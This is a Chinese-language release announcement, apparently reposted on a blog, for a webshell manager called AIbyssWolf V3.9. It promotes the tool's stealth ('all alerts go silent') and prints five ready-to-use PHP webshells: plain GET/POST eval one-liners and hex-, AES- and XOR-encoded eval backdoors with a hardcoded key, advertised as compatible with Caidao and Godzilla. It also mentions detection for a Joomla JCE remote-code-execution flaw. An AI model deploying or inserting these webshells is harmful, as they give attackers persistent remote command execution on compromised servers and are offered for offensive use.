幽狼AIbyssWolf V3.9:新增PHP WebShell
🐺 幽狼 · Abyss Wolf
传说,在每一行代码的阴影里,蛰伏着一头来自深渊的狼。它以废弃的字节为食,以破碎的协议为巢。无人得见其形,只因它的爪痕从不留在日志之上。它不追逐光,不咆哮于风,只等那扇虚掩的门扉。当门缝透出权限的微光,幽狼便悄然而至——那时,所有告警沉默,所有进程沉睡,仿佛整个世界都不曾察觉。唯有虚空记得:幽狼已至,万物无声。
更新信息
V3.9 20260705 新增PHP WebShell
[+]新增 PHP AES CmdShell [+]新增 PHP XOR CmdShell
[+]新增 PHP Hex CmdShell [+]新增 PHP Base64 CmdShell (兼容菜刀) [+]新增 PHP Plain CmdShell (兼容部分组织)

幽狼核心采用AES加密通讯机制,但在实战场景中,并非所有目标环境都预装了AES加密依赖组件。综合兼容性最优的加密通讯方案为XOR、HEX、Base64三类,其中Base64编码生成的内容长度最短,可适配更多存在长度限制的漏洞场景,同时天然兼容菜刀、哥斯拉等主流WebShell工具。Plain明文通讯模式则专门用于实验环境下的Payload调试,还可直接对接部分组织通过浏览器操作的Shell。
Plain 明文通讯
为了兼容部分组织的Shell密码不加密成Hash
<?php @eval($_GET['WolfShell']); ?>
Base64 加密通讯
为了兼容菜刀等WebShell密码不加密成Hash
<?php @eval($_POST['WolfShell']); ?>
Hex 加密通讯
<?php
@error_reporting(0);
$k = "ca63457538b9b1e0";
if (isset($_POST[$k])) {
$dec = hex2bin($_POST[$k]);
eval($dec);
}
?>
AES 加密通讯
<?php
@error_reporting(0);
session_start();
$key = "ca63457538b9b1e0";
$_SESSION['k'] = $key;
$post_data = file_get_contents("php://input");
if (strlen($post_data) > 0) {
if (extension_loaded('openssl')) {
$decrypted_data = openssl_decrypt($post_data, 'AES-128-CBC', $key, OPENSSL_RAW_DATA, $key);
if ($decrypted_data !== false) {
eval($decrypted_data);
}
}
}
?>
XOR 加密通讯
<?php
@error_reporting(0);
session_start();
$key = "ca63457538b9b1e0";
$_SESSION['k'] = $key;
$post_data = file_get_contents("php://input");
if (strlen($post_data) > 0) {
$kl = strlen($key);
$decrypted_data = "";
for ($i = 0; $i < strlen($post_data); $i++) {
$decrypted_data .= $post_data[$i] ^ $key[$i % $kl];
}
eval($decrypted_data);
}
?>V3.8 20260704 新增分组显示
[u]幽狼 EXE 改名 AIbyssWolf 简写AW
[+]优化Shell加载速度,减少卡顿,XML 解析时不碰 UI
[+]右键菜单分组显示 (字母排序、当前组自动打勾、不重复刷新)
[+]增加EXE文件SHA1值列表,方便用户验证是否原始文件

CVE-2026-48907 Joomla JCE Editor中的一个 未授权远程代码执行 漏洞检测,影响版本 2.9.99.4 及之前版本。

免责声明
下载地址:
本文为要教会原创,欢迎转载分享。转载时请务必在文章页面明显位置提供本文链接并注明出处。感谢您对知识的尊重和对本文的肯定!本文链接网址:https://yaojiaohui.net/wangluoanquan/1638.html
1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。


支付宝打赏
微信打赏 






